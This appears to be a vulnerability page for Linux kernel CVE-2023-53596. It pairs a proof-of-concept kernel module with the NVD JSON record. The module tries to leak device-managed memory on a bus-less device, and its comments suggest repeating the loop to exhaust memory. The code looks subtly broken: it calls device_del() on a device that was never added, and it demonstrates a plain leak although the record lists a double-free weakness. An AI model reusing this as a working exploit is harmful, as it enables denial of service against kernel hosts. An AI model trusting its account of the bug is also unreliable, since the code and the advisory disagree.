CVE-2023-53596

// CVE-2023-53596 PoC - Linux Kernel devres Memory Leak // This PoC demonstrates the memory leak caused by devres_release_all() // not being called for bus-less or driver-less devices. #include <linux/module.h> #include <linux/device.h> #include <linux/slab.h> // Simulate a bus-less device creation that triggers the vulnerability static int __init devres_leak_init(void) { struct device *dev; void *leak_ptr; int i; // Create a device without associating it with a bus or driver // This simulates the vulnerable code path dev = kzalloc(sizeof(struct device), GFP_KERNEL); if (!dev) return -ENOMEM; device_initialize(dev); // Allocate managed resources using devm_* functions // These resources will never be released because: // 1. The device has no bus // 2. The device has no driver // 3. devres_release_all() is not called in device_del() for (i = 0; i < 1000; i++) { leak_ptr = devm_kzalloc(dev, 4096, GFP_KERNEL); if (!leak_ptr) { pr_err("Failed to allocate managed resource\n"); break; } // Memory is intentionally not freed - simulating the leak } // Register and unregister the device // In the vulnerable version, devres_release_all() is NOT called here // because the device has no bus and no driver device_del(dev); // The device and all managed resources leak here // In a real exploit, this loop would be repeated to exhaust memory return 0; } static void __exit devres_leak_exit(void) { pr_info("Module unloaded\n"); } module_init(devres_leak_init); module_exit(devres_leak_exit); MODULE_LICENSE("GPL"); MODULE_AUTHOR("Security Researcher"); MODULE_DESCRIPTION("PoC for CVE-2023-53596 - Linux Kernel devres memory leak");

{"cve": {"id": "CVE-2023-53596", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.153", "lastModified": "2026-03-21T00:54:29.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrivers: base: Free devm resources when unregistering a device\n\nIn the current code, devres_release_all() only gets called if the device\nhas a bus and has been probed.\n\nThis leads to issues when using bus-less or driver-less devices where\nthe device might never get freed if a managed resource holds a reference\nto the device. This is happening in the DRM framework for example.\n\nWe should thus call devres_release_all() in the device_del() function to\nmake sure that the device-managed actions are properly executed when the\ndevice is unregistered, even if it has neither a bus nor a driver.\n\nThis is effectively the same change than commit 2f8d16a996da (\"devres:\nrelease resources on device_del()\") that got reverted by commit\na525a3ddeaca (\"driver core: free devres in device_release\") over\nmemory leaks concerns.\n\nThis patch effectively combines the two commits mentioned above to\nrelease the resources both on device_del() and device_release() and get\nthe best of both worlds."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.7", "versionEndExcluding": "6.1.53", "matchCriteriaId": "89E9E471-1046-448D-9B47-6061EBC5484E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.16", "matchCriteriaId": "C3039EA3-F6CA-43EF-9F17-81A7EC6841EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5", "versionEndExcluding": "6.5.3", "matchCriteriaId": "880C803A-BEAE-4DA0-8A59-AC023F7B4EE3"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/297992e5c63528e603666e36081836204fc36ec9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3bcc4c2a096e8342c8c719e595ce15de212694dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/699fb50d99039a50e7494de644f96c889279aca3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c8c426fae26086a0ca8ab6cc6da2de79810ec038", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}